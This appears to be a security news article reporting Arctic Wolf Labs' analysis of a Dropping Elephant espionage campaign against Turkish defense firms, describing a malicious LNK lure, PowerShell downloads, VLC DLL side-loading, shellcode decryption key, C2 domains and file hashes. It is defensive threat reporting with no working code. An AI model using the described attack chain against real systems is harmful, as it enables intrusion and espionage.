Arctic Wolf Labs has identified a sophisticated cyber-espionage campaign by the Dropping Elephant APT group targeting Turkish defense contractors, specifically a manufacturer of precision-guided missile systems.
The campaign showcases a significant technical evolution from the group’s previous operations, employing a five-stage execution chain that leverages the popular VLC Media Player through DLL side-loading techniques to deliver encrypted shellcode payloads.
Strategic Targeting of Turkish Defense Industry
The attack centers on a carefully crafted spear-phishing campaign using malicious LNK files disguised as conference invitations for the “Unmanned Vehicle Systems Conference 2025 in Istanbul.”
The timing appears deliberately aligned with heightened Turkey-Pakistan defense cooperation and recent India-Pakistan military tensions, suggesting geopolitically motivated targeting.
The threat actor leverages Turkey’s commanding 65% share of the global UAV export market and its critical development of hypersonic missile capabilities as strategic intelligence objectives.
The initial vector involves a malicious LNK file (SHA-256: 341f27419becc456b52d6fbe2d223e8598065ac596fa8dec23cc722726a28f62) that executes PowerShell commands to download five distinct components from the malicious domain expouav[.]org, which mimics the legitimate conference website waset.org.
The downloaded files include a visual PDF decoy, legitimate VLC Player and Microsoft Task Scheduler binaries, a malicious DLL library, and encrypted shellcode stored as vlc.log.
Technical Evolution and Advanced Evasion Methods
Dropping Elephant has significantly evolved its technical capabilities, transitioning from x64 DLL variants observed in November 2024 to current x86 PE executables with enhanced command structures.
The group has reduced library dependencies and implemented direct C2 command parsing using the C-standard library’s strtok() function with dollar sign delimiters, indicating deliberate operational security improvements.
The attack establishes persistence through a scheduled task that abuses VLC Media Player to side-load the malicious libvlc.dll file (SHA-256: 2cd2a4f1fc7e4b621b29d41e42789c1365e5689b4e3e8686b80f80268e2c0d8d).
The shellcode is decrypted using the key “76bhu93FGRjZX5hj876bhu93FGRjX5” and becomes a 139.37 KB x86 PE executable capable of comprehensive system reconnaissance.
The malware creates a mutex named “ghjghkj” to prevent multiple instances and performs extensive victim profiling, including collecting computer names, gathering usernames, retrieving firmware information, and enabling screenshot capture functionality.
Communication occurs through the C2 server roseserve[.]org, which impersonates Turkey’s Pardus Linux distribution project website to maintain operational security.
The infrastructure analysis reveals sophisticated preparation, with domain registrations beginning in June 2025 and active operations commencing in July 2025, demonstrating careful campaign planning rather than opportunistic targeting.
Arctic Wolf Labs has implemented new detections in its Aurora Platform to protect customers against this evolving threat.
Indicators of Compromise (IOCs)
File Indicators
| Name | SHA-256 |
| Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.lnk | 341f27419becc456b52d6fbe2d223e8598065ac596fa8dec23cc722726a28f62 |
| Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf | 588021b5553838fae5498de40172d045b5168c8e608b8929a7309fd08abfaa93 |
| lake (libvlc.dll) | 2cd2a4f1fc7e4b621b29d41e42789c1365e5689b4e3e8686b80f80268e2c0d8d |
| vlc.log | 89ec9f19958a442e9e3dd5c96562c61229132f3acb539a6b919c15830f403553 |
